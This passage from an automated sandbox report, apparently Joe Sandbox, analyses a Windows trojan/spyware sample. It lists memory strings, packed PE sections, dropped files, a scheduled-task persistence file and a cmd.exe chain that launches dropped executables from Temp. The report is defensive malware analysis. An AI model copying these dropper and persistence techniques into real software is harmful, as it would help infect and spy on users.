Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr String found in binary or memory: https://www.mozilla.org
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr String found in binary or memory: https://www.mozilla.org#
Source: file.exe, 00000000.00000002.2622413487.00000000003A8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000002.2622413487.00000000003A8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2622413487.00000000004AA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2622413487.00000000003A8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000002.2622413487.00000000004AA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary
barindex
PE file contains section with special chars
Source: BAFIEGIECG.exe.0.dr Static PE information: section name:
Source: BAFIEGIECG.exe.0.dr Static PE information: section name: .idata
Source: BAFIEGIECG.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.10.dr Static PE information: section name:
Source: explorti.exe.10.dr Static PE information: section name: .idata
Source: explorti.exe.10.dr Static PE information: section name:
PE file has nameless sections
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: random[1].exe.14.dr Static PE information: section name:
Source: random[1].exe.14.dr Static PE information: section name:
Source: random[1].exe.14.dr Static PE information: section name:
Source: random[1].exe.14.dr Static PE information: section name:
Source: random[1].exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CA1B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CA1B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CA1B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C9BF280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B35A0 0_2_6C9B35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA134A0 0_2_6CA134A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1C4A0 0_2_6CA1C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C6C80 0_2_6C9C6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DD4D0 0_2_6C9DD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C64C0 0_2_6C9C64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F6CF0 0_2_6C9F6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BD4E0 0_2_6C9BD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2542B 0_2_6CA2542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F5C10 0_2_6C9F5C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2AC00 0_2_6CA2AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA02C10 0_2_6CA02C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C5440 0_2_6C9C5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2545C 0_2_6CA2545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F0DD0 0_2_6C9F0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA185F0 0_2_6CA185F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9E0512 0_2_6C9E0512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DED10 0_2_6C9DED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CFD00 0_2_6C9CFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA14EA0 0_2_6CA14EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D5E90 0_2_6C9D5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1E680 0_2_6CA1E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA276E3 0_2_6CA276E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BBEF0 0_2_6C9BBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CFEF0 0_2_6C9CFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F7E10 0_2_6C9F7E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA19E30 0_2_6CA19E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA05600 0_2_6CA05600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA26E63 0_2_6CA26E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D9E50 0_2_6C9D9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F3E50 0_2_6C9F3E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D4640 0_2_6C9D4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BC670 0_2_6C9BC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA02E4E 0_2_6CA02E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA077A0 0_2_6CA077A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9E6FF0 0_2_6C9E6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BDFE0 0_2_6C9BDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F7710 0_2_6C9F7710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C9F00 0_2_6C9C9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9E60A0 0_2_6C9E60A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA250C7 0_2_6CA250C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DC0E0 0_2_6C9DC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F58E0 0_2_6C9F58E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA04820 0_2_6CA04820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C7810 0_2_6C9C7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9FB820 0_2_6C9FB820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D8850 0_2_6C9D8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DD850 0_2_6C9DD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9FF070 0_2_6C9FF070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F5190 0_2_6C9F5190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9ED9B0 0_2_6C9ED9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA12990 0_2_6CA12990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BC9A0 0_2_6C9BC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA0B970 0_2_6CA0B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2B170 0_2_6CA2B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DA940 0_2_6C9DA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CD960 0_2_6C9CD960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA22AB0 0_2_6CA22AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CCAB0 0_2_6C9CCAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2BA90 0_2_6CA2BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B22A0 0_2_6C9B22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9E4AA0 0_2_6C9E4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F8AC0 0_2_6C9F8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D1AF0 0_2_6C9D1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9FE2F0 0_2_6C9FE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F9A60 0_2_6C9F9A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BF380 0_2_6C9BF380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA253C8 0_2_6CA253C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9FD320 0_2_6C9FD320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B5340 0_2_6C9B5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CC370 0_2_6C9CC370
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009B4CD0 14_2_009B4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009F3048 14_2_009F3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009E7D63 14_2_009E7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009B4AD0 14_2_009B4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009F6EE9 14_2_009F6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009F763B 14_2_009F763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009F2BB0 14_2_009F2BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009F8700 14_2_009F8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009F775B 14_2_009F775B
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C9ECBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C9F94D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2653332055.000000006CC35000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2623849094.000000000178E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9997141768292683
Source: file.exe Static PE information: Section: ZLIB complexity 0.99517822265625
Source: file.exe Static PE information: Section: ZLIB complexity 0.9893798828125
Source: BAFIEGIECG.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981589395491803
Source: BAFIEGIECG.exe.0.dr Static PE information: Section: gxzeqrwn ZLIB complexity 0.9946359619212621
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9981589395491803
Source: amadka[1].exe.0.dr Static PE information: Section: gxzeqrwn ZLIB complexity 0.9946359619212621
Source: explorti.exe.10.dr Static PE information: Section: ZLIB complexity 0.9981589395491803
Source: explorti.exe.10.dr Static PE information: Section: gxzeqrwn ZLIB complexity 0.9946359619212621
Source: random[1].exe.14.dr Static PE information: Section: ZLIB complexity 0.9997141768292683
Source: random[1].exe.14.dr Static PE information: Section: ZLIB complexity 0.99517822265625
Source: random[1].exe.14.dr Static PE information: Section: ZLIB complexity 0.9893798828125
Source: 7873c16243.exe.14.dr Static PE information: Section: ZLIB complexity 0.9997141768292683
Source: 7873c16243.exe.14.dr Static PE information: Section: ZLIB complexity 0.99517822265625
Source: 7873c16243.exe.14.dr Static PE information: Section: ZLIB complexity 0.9893798828125
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/30@2/3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA17030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CA17030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2509936329.0000000022CC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2493464108.0000000022CD4000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr, EBGDAAKJJDAAKFHJKJKF.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 45%
Source: BAFIEGIECG.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GDHIIIIEHC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe "C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GDHIIIIEHC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe "C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
